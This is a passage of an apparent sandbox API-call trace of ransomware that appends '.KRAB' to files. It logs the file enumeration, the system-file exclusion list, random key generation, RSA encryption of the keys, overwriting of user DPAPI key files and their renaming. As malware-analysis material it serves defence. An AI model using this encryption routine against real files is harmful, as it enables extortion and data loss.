(hObject=0x448) returned 1 [0061.822] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.823] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\496f2c5b-a90f-4380-b805-3bf6ac63451b" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1462094071-1423818996-289466292-1000\\496f2c5b-a90f-4380-b805-3bf6ac63451b"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\496f2c5b-a90f-4380-b805-3bf6ac63451b.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1462094071-1423818996-289466292-1000\\496f2c5b-a90f-4380-b805-3bf6ac63451b.krab")) returned 1 [0061.824] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.824] FindNextFileW (in: hFindFile=0xfbd820, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0061.824] lstrcmpW (lpString1="5b8a3202-35dc-4437-b5d7-374f5e872415", lpString2=".") returned 1 [0061.824] lstrcmpW (lpString1="5b8a3202-35dc-4437-b5d7-374f5e872415", lpString2="..") returned 1 [0061.824] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\", lpString2="5b8a3202-35dc-4437-b5d7-374f5e872415" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\5b8a3202-35dc-4437-b5d7-374f5e872415") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\5b8a3202-35dc-4437-b5d7-374f5e872415" [0061.824] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0061.824] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\5b8a3202-35dc-4437-b5d7-374f5e872415.KRAB") returned 143 [0061.824] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\5b8a3202-35dc-4437-b5d7-374f5e872415") returned 138 [0061.824] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\5b8a3202-35dc-4437-b5d7-374f5e872415") returned 138 [0061.824] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\5b8a3202-35dc-4437-b5d7-374f5e872415") returned 138 [0061.824] lstrcmpiW (lpString1="5b8a3202-35dc-4437-b5d7-374f5e872415", lpString2="desktop.ini") returned -1 [0061.824] lstrcmpiW (lpString1="5b8a3202-35dc-4437-b5d7-374f5e872415", lpString2="autorun.inf") returned -1 [0061.824] lstrcmpiW (lpString1="5b8a3202-35dc-4437-b5d7-374f5e872415", lpString2="ntuser.dat") returned -1 [0061.824] lstrcmpiW (lpString1="5b8a3202-35dc-4437-b5d7-374f5e872415", lpString2="iconcache.db") returned -1 [0061.824] lstrcmpiW (lpString1="5b8a3202-35dc-4437-b5d7-374f5e872415", lpString2="bootsect.bak") returned -1 [0061.825] lstrcmpiW (lpString1="5b8a3202-35dc-4437-b5d7-374f5e872415", lpString2="boot.ini") returned -1 [0061.825] lstrcmpiW (lpString1="5b8a3202-35dc-4437-b5d7-374f5e872415", lpString2="ntuser.dat.log") returned -1 [0061.825] lstrcmpiW (lpString1="5b8a3202-35dc-4437-b5d7-374f5e872415", lpString2="thumbs.db") returned -1 [0061.825] lstrcmpiW (lpString1="5b8a3202-35dc-4437-b5d7-374f5e872415", lpString2="KRAB-DECRYPT.html") returned -1 [0061.825] lstrcmpiW (lpString1="5b8a3202-35dc-4437-b5d7-374f5e872415", lpString2="KRAB-DECRYPT.txt") returned -1 [0061.825] lstrcmpiW (lpString1="5b8a3202-35dc-4437-b5d7-374f5e872415", lpString2="CRAB-DECRYPT.txt") returned -1 [0061.825] lstrcmpiW (lpString1="5b8a3202-35dc-4437-b5d7-374f5e872415", lpString2="ntldr") returned -1 [0061.825] lstrcmpiW (lpString1="5b8a3202-35dc-4437-b5d7-374f5e872415", lpString2="NTDETECT.COM") returned -1 [0061.825] lstrcmpiW (lpString1="5b8a3202-35dc-4437-b5d7-374f5e872415", lpString2="Bootfont.bin") returned -1 [0061.825] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0061.825] CryptAcquireContextW (in: phProv=0x338e734, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e734*=0xfbca08) returned 1 [0061.825] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f60000 [0061.826] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0061.826] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0061.826] CryptGenRandom (in: hProv=0xfbca08, dwLen=0x20, pbBuffer=0x338e7cc | out: pbBuffer=0x338e7cc) returned 1 [0061.826] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0061.826] VirtualFree (lpAddress=0x2f60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.826] CryptAcquireContextW (in: phProv=0x338e734, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e734*=0xfbca08) returned 1 [0061.827] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2f60000 [0061.827] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0061.827] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0061.827] CryptGenRandom (in: hProv=0xfbca08, dwLen=0x8, pbBuffer=0x338e7ec | out: pbBuffer=0x338e7ec) returned 1 [0061.827] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0061.827] VirtualFree (lpAddress=0x2f60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.828] CryptAcquireContextW (in: phProv=0x338e72c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e72c*=0xfbca08) returned 1 [0061.828] CryptImportKey (in: hProv=0xfbca08, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e730 | out: phKey=0x338e730*=0xfbd360) returned 1 [0061.828] CryptGetKeyParam (in: hKey=0xfbd360, dwParam=0x8, pbData=0x338e724, pdwDataLen=0x338e728, dwFlags=0x0 | out: pbData=0x338e724*=0x800, pdwDataLen=0x338e728*=0x4) returned 1 [0061.828] CryptEncrypt (in: hKey=0xfbd360, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338e75c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338e75c*=0x100) returned 1 [0061.829] GetLastError () returned 0x0 [0061.829] CryptDestroyKey (hKey=0xfbd360) returned 1 [0061.829] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0061.829] CryptAcquireContextW (in: phProv=0x338e72c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e72c*=0xfbca08) returned 1 [0061.829] CryptImportKey (in: hProv=0xfbca08, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e730 | out: phKey=0x338e730*=0xfbd520) returned 1 [0061.829] CryptGetKeyParam (in: hKey=0xfbd520, dwParam=0x8, pbData=0x338e724, pdwDataLen=0x338e728, dwFlags=0x0 | out: pbData=0x338e724*=0x800, pdwDataLen=0x338e728*=0x4) returned 1 [0061.829] CryptEncrypt (in: hKey=0xfbd520, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338e75c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338e75c*=0x100) returned 1 [0061.830] GetLastError () returned 0x0 [0061.830] CryptDestroyKey (hKey=0xfbd520) returned 1 [0061.830] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0061.830] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\5b8a3202-35dc-4437-b5d7-374f5e872415" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1462094071-1423818996-289466292-1000\\5b8a3202-35dc-4437-b5d7-374f5e872415"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x448 [0061.830] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x35e0000 [0061.831] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0061.831] ReadFile (in: hFile=0x448, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e7fc, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338e7fc*=0x1d4, lpOverlapped=0x0) returned 1 [0061.851] SetFilePointerEx (in: hFile=0x448, liDistanceToMove=0xfffffe2c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.851] WriteFile (in: hFile=0x448, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0x1d4, lpNumberOfBytesWritten=0x338e7f8, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338e7f8*=0x1d4, lpOverlapped=0x0) returned 1 [0061.851] WriteFile (in: hFile=0x448, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e7f8, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338e7f8*=0x208, lpOverlapped=0x0) returned 1 [0061.854] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.860] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.861] CloseHandle (hObject=0x448) returned 1 [0061.866] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.866] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\5b8a3202-35dc-4437-b5d7-374f5e872415" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1462094071-1423818996-289466292-1000\\5b8a3202-35dc-4437-b5d7-374f5e872415"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\5b8a3202-35dc-4437-b5d7-374f5e872415.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1462094071-1423818996-289466292-1000\\5b8a3202-35dc-4437-b5d7-374f5e872415.krab")) returned 1 [0061.867] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.867] FindNextFileW (in: hFindFile=0xfbd820, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0061.867] lstrcmpW (lpString1="a0f53be0-84fb-4908-9252-998f080e895a", lpString2=".") returned 1 [0061.867] lstrcmpW (lpString1="a0f53be0-84fb-4908-9252-998f080e895a", lpString2="..") returned 1 [0061.867] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\", lpString2="a0f53be0-84fb-4908-9252-998f080e895a" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\a0f53be0-84fb-4908-9252-998f080e895a") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\a0f53be0-84fb-4908-9252-998f080e895a" [0061.867] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0061.868] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\a0f53be0-84fb-4908-9252-998f080e895a.KRAB") returned 143 [0061.868] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\a0f53be0-84fb-4908-9252-998f080e895a") returned 138 [0061.868] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\a0f53be0-84fb-4908-9252-998f080e895a") returned 138 [0061.868] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\a0f53be0-84fb-4908-9252-998f080e895a") returned 138 [0061.868] lstrcmpiW (lpString1="a0f53be0-84fb-4908-9252-998f080e895a", lpString2="desktop.ini") returned -1 [0061.868] lstrcmpiW (lpString1="a0f53be0-84fb-4908-9252-998f080e895a", lpString2="autorun.inf") returned -1 [0061.868] lstrcmpiW (lpString1="a0f53be0-84fb-4908-9252-998f080e895a", lpString2="ntuser.dat") returned -1 [0061.868] lstrcmpiW (lpString1="a0f53be0-84fb-4908-9252-998f080e895a", lpString2="iconcache.db") returned -1 [0061.868] lstrcmpiW (lpString1="a0f53be0-84fb-4908-9252-998f080e895a", lpString2="bootsect.bak") returned -1 [0061.868] lstrcmpiW (lpString1="a0f53be0-84fb-4908-9252-998f080e895a", lpString2="boot.ini") returned -1 [0061.868] lstrcmpiW (lpString1="a0f53be0-84fb-4908-9252-998f080e895a", lpString2="ntuser.dat.log") returned -1 [0061.868] lstrcmpiW (lpString1="a0f53be0-84fb-4908-9252-998f080e895a", lpString2="thumbs.db") returned -1 [0061.868] lstrcmpiW (lpString1="a0f53be0-84fb-4908-9252-998f080e895a", lpString2="KRAB-DECRYPT.html") returned -1 [0061.868] lstrcmpiW (lpString1="a0f53be0-84fb-4908-9252-998f080e895a", lpString2="KRAB-DECRYPT.txt") returned -1 [0061.868] lstrcmpiW (lpString1="a0f53be0-84fb-4908-9252-998f080e895a", lpString2="CRAB-DECRYPT.txt") returned -1 [0061.868] lstrcmpiW (lpString1="a0f53be0-84fb-4908-9252-998f080e895a", lpString2="ntldr") returned -1 [0061.868] lstrcmpiW (lpString1="a0f53be0-84fb-4908-9252-998f080e895a", lpString2="NTDETECT.COM") returned -1 [0061.869] lstrcmpiW (lpString1="a0f53be0-84fb-4908-9252-998f080e895a", lpString2="Bootfont.bin") returned -1 [0061.869] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0061.869] CryptAcquireContextW (in: phProv=0x338e734, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e734*=0xfbca08) returned 1 [0061.869] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f60000 [0061.870] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0061.870] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0061.870] CryptGenRandom (in: hProv=0xfbca08, dwLen=0x20, pbBuffer=0x338e7cc | out: pbBuffer=0x338e7cc) returned 1 [0061.870] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0061.870] VirtualFree (lpAddress=0x2f60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.871] CryptAcquireContextW (in: phProv=0x338e734, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e734*=0xfbca08) returned 1 [0061.871] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2f60000 [0061.871] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0061.872] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0061.872] CryptGenRandom (in: hProv=0xfbca08, dwLen=0x8, pbBuffer=0x338e7ec | out: pbBuffer=0x338e7ec) returned 1 [0061.872] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0061.872] VirtualFree (lpAddress=0x2f60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.872] CryptAcquireContextW (in: phProv=0x338e72c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e72c*=0xfbca08) returned 1 [0061.873] CryptImportKey (in: hProv=0xfbca08, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e730 | out: phKey=0x338e730*=0xfbd7a0) returned 1 [0061.873] CryptGetKeyParam (in: hKey=0xfbd7a0, dwParam=0x8, pbData=0x338e724, pdwDataLen=0x338e728, dwFlags=0x0 | out: pbData=0x338e724*=0x800, pdwDataLen=0x338e728*=0x4) returned 1 [0061.873] CryptEncrypt (in: hKey=0xfbd7a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338e75c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338e75c*=0x100) returned 1 [0061.873] GetLastError () returned 0x0 [0061.873] CryptDestroyKey (hKey=0xfbd7a0) returned 1 [0061.873] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0061.873] CryptAcquireContextW (in: phProv=0x338e72c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e72c*=0xfbca08) returned 1 [0061.874] CryptImportKey (in: hProv=0xfbca08, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e730 | out: phKey=0x338e730*=0xfbd5e0) returned 1 [0061.874] CryptGetKeyParam (in: hKey=0xfbd5e0, dwParam=0x8, pbData=0x338e724, pdwDataLen=0x338e728, dwFlags=0x0 | out: pbData=0x338e724*=0x800, pdwDataLen=0x338e728*=0x4) returned 1 [0061.874] CryptEncrypt (in: hKey=0xfbd5e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338e75c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338e75c*=0x100) returned 1 [0061.874] GetLastError () returned 0x0 [0061.874] CryptDestroyKey (hKey=0xfbd5e0) returned 1 [0061.874] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0061.874] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\a0f53be0-84fb-4908-9252-998f080e895a" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1462094071-1423818996-289466292-1000\\a0f53be0-84fb-4908-9252-998f080e895a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x448 [0061.876] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x35e0000 [0061.877] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0061.877] ReadFile (in: hFile=0x448, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e7fc, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338e7fc*=0x1d4, lpOverlapped=0x0) returned 1 [0061.909] SetFilePointerEx (in: hFile=0x448, liDistanceToMove=0xfffffe2c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.909] WriteFile (in: hFile=0x448, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0x1d4, lpNumberOfBytesWritten=0x338e7f8, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338e7f8*=0x1d4, lpOverlapped=0x0) returned 1 [0061.909] WriteFile (in: hFile=0x448, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e7f8, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338e7f8*=0x208, lpOverlapped=0x0) returned 1 [0061.910] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.916] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.917] CloseHandle (hObject=0x448) returned 1 [0061.921] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.922] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\a0f53be0-84fb-4908-9252-998f080e895a" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1462094071-1423818996-289466292-1000\\a0f53be0-84fb-4908-9252-998f080e895a"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\a0f53be0-84fb-4908-9252-998f080e895a.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1462094071-1423818996-289466292-1000\\a0f53be0-84fb-4908-9252-998f080e895a.krab")) returned 1 [0061.923] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.923] FindNextFileW (in: hFindFile=0xfbd820, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0061.923] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0061.923] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0061.923] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\d2ca4a08d2ca4dee3d.lock" [0061.923] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0061.923] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 130 [0061.924] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\d2ca4a08d2ca4dee3d.lock") returned 125 [0061.924] lstrlenW (lpString=".lock") returned 5 [0061.924] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0061.924] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lock ") returned 6 [0061.924] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.924] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.925] FindNextFileW (in: hFindFile=0xfbd820, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0061.925] lstrcmpW (lpString1="d7746ecf-458e-4e71-8557-8ac80457022a", lpString2=".") returned 1 [0061.925] lstrcmpW (lpString1="d7746ecf-458e-4e71-8557-8ac80457022a", lpString2="..") returned 1 [0061.925] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\", lpString2="d7746ecf-458e-4e71-8557-8ac80457022a" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\d7746ecf-458e-4e71-8557-8ac80457022a") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\d7746ecf-458e-4e71-8557-8ac80457022a" [0061.925] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0061.925] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\d7746ecf-458e-4e71-8557-8ac80457022a.KRAB") returned 143 [0061.925] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\d7746ecf-458e-4e71-8557-8ac80457022a") returned 138 [0061.925] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\d7746ecf-458e-4e71-8557-8ac80457022a") returned 138 [0061.925] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1462094071-1423818996-289466292-1000\\d7746ecf-458e-4e71-8557-8ac80457022a") returned 138 [0061.925] lstrcmpiW (lpString1="d7746ecf-458e-4e71-8557-8ac80457022a", lpString2="desktop.ini") returned -1 [0061.925] lstrcmpiW (lpString1="d7746ecf-458e-4e71-8557-8ac80457022a", lpString2="autorun.inf") returned 1 [0061.925] lstrcmpiW (lpString1="d7746ecf-458e-4e71-8557-8ac80457022a", lpString2="ntuser.dat") returned -1 [0061.925] lstrcmpiW (lpString1="d7746ecf-458e-4e71-8557-8ac80457022a", lpString2="iconcache.db") returned -1 [0061.925] lstrcmpiW (lpString1="d7746ecf-458e-4e71-8557-8ac80457022a", lpString2="bootsect.bak") returned 1 [0061.925] lstrcmpiW (lpString1="d7746ecf-458e-4e71-8557-8ac80457022a", lpString2="boot.ini") returned 1 [0061.925] lstrcmpiW (lpString1="d7746ecf-458e-4e71-8557-8ac80457022a", lpString2="ntuser.dat.log") returned -1 [0061.926] lstrcmpiW (lpString1="d7746ecf-458e-4e71-8557-8ac80457022a", lpString2="thumbs.db") returned -1 [0061.926] lstrcmpiW (lpString1="d7746ecf-458e-4e71-8557-8ac80457022a", lpString2="KRAB-DECRYPT.html") returned -1 [0061.926] lstrcmpiW (lpString1="d7746ecf-458e-4e71-8557-8ac80457022a", lpString2="KRAB-DECRYPT.txt") returned -1 [0061.926] lstrcmpiW (lpString1="d7746ecf-458e-4e71-8557-8ac80457022a", lpString2="CRAB-DECRYPT.txt") returned 1 [0061.926] lstrcmpiW (lpString1="d7746ecf-458e-4e71-8557-8ac80457022a", lpString2="ntldr") returned -1 [0061.926] lstrcmpiW (lpString1="d7746ecf-458e-4e71-8557-8ac80457022a", lpString2="NTDETECT.COM") returned -1 [0061.926] lstrcmpiW (lpString1="d7746ecf-458e-4e71-8557-8ac80457022a", lpString2="Bootfont.bin") returned 1 [0061.926] VirtualAlloc (lpAddress=0x0, dwSize=0x208, 